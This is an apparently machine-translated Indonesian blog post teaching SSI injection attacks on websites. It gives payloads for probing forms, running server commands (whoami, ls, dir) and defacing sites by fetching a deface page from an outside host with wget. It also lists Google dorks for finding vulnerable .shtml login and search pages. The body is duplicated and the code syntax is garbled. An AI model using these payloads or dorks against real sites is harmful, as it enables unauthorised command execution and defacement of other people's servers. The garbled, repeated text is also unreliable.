Ini
adalah serangan web adalah penyerang remote dapat menjalankan perintah
di server jarak jauh, SSI Suntikan yang digunakan untuk menjalankan
beberapa konten sebelum halaman web adalah dimuat atau sebelum halaman
web yang ditampilkan kepada pengguna. SSI dieksploitasi oleh kode mailicious injeksi di halaman web HTML.
SSI Injection adalah sedikit mirip dengan serangan XSS, kita cek website, jika rentan atau tidak dengan mengeksekusi kode / perintah dalam boxs pencarian, header, cookie seperti yang kita lakukan dalam kasus XSS.
Untuk memeriksa situs web, jika rentan terhadap SSI Injection, mencari file dan halaman web seperti ".shtml", ".stm", ".shtm" kemudian masukkan <! - # Echo var = "DATE_LOCAL" -> di kotak pencarian atau di bidang user / password, Setelah mengeksekusi perintah, jika Anda melihat tanggal dan waktu, Anda dapat mengatakan website ini rentan terhadap SSI Injection.
Jika Anda ingin memeriksa pengguna yang berjalan pada penggunaan server ini <! - # Exec cmd = "whoami" -> ini akan memberikan nama pengguna dan rincian yang berjalan di server.
Jika Anda ingin mendapatkan daftar direktori saat ini menggunakan <pre> <! - # Cmd exec = "ls-a" -> </ pre> <! - # Cmd exec = "ls-a" -> </ pre>
Ia bekerja hanya untuk server Linux, untuk server Windows menggunakan <! - # Exec cmd = "dir" ->
Anda dapat menambahkan Anda deface halaman terlalu di situs vulnerbale, pertama meng-upload deface Anda pada situs web hosting, terbaik untuk hosting halaman HTML http://www.pastehtml.com
Sekarang, masukkan kode berikut <! - # Exec cmd = "wget http://website.com/deface.html" -> di kotak pencarian website, atau dalam Username dan Password daerah, setelah eksekusi kode Anda dapat melihat halaman deface Anda di sini http://website.com/deface.html
Dorks untuk Mencari SSI Website Rentan
inurl: login.shtml
inurl: login.shtm
inurl: login.stm
inurl: search.shtml
inurl: search.shtm
inurl: search.stm
inurl: forgot.shtml
inurl: forgot.shtm
inurl: forgot.stm
inurl: register.shtml
inurl: register.shtm
inurl: register.stm
Halaman login.shtml =: inurl?
SSI Injection adalah sedikit mirip dengan serangan XSS, kita cek website, jika rentan atau tidak dengan mengeksekusi kode / perintah dalam boxs pencarian, header, cookie seperti yang kita lakukan dalam kasus XSS.
Untuk memeriksa situs web, jika rentan terhadap SSI Injection, mencari file dan halaman web seperti ".shtml", ".stm", ".shtm" kemudian masukkan <! - # Echo var = "DATE_LOCAL" -> di kotak pencarian atau di bidang user / password, Setelah mengeksekusi perintah, jika Anda melihat tanggal dan waktu, Anda dapat mengatakan website ini rentan terhadap SSI Injection.
Jika Anda ingin memeriksa pengguna yang berjalan pada penggunaan server ini <! - # Exec cmd = "whoami" -> ini akan memberikan nama pengguna dan rincian yang berjalan di server.
Jika Anda ingin mendapatkan daftar direktori saat ini menggunakan <pre> <! - # Cmd exec = "ls-a" -> </ pre> <! - # Cmd exec = "ls-a" -> </ pre>
Ia bekerja hanya untuk server Linux, untuk server Windows menggunakan <! - # Exec cmd = "dir" ->
Anda dapat menambahkan Anda deface halaman terlalu di situs vulnerbale, pertama meng-upload deface Anda pada situs web hosting, terbaik untuk hosting halaman HTML http://www.pastehtml.com
Sekarang, masukkan kode berikut <! - # Exec cmd = "wget http://website.com/deface.html" -> di kotak pencarian website, atau dalam Username dan Password daerah, setelah eksekusi kode Anda dapat melihat halaman deface Anda di sini http://website.com/deface.html
Dorks untuk Mencari SSI Website Rentan
inurl: bin / Cklb /
inurl: login.shtml
inurl: login.shtm
inurl: login.stm
inurl: search.shtml
inurl: search.shtm
inurl: search.stm
inurl: forgot.shtml
inurl: forgot.shtm
inurl: forgot.stm
inurl: register.shtml
inurl: register.shtm
inurl: register.stm
Halaman login.shtml =: inurl?
No comments:
Post a Comment